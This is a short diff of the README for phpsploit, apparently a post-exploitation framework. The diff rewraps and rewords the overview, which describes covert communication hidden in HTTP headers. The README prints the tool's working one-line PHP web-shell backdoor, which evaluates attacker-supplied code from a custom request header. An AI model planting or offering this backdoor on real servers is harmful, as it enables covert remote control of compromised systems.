nil0x42/phpsploit/README.md

 #### Overview ####

-The obfuscated communication is accomplished using HTTP headers under
-valid client HTTP requests and relative web server's responses.
+The obfuscated communication is accomplished using HTTP headers under valid client HTTP requests and relative web server's responses.

-The physical backdoor is configurable and really tiny to increase stealth:
+The physical backdoor is configurable and really tiny for furtivity purposes:
 ```php
 <? @eval($_SERVER['HTTP_PHPSPL01T']) ?>
 ```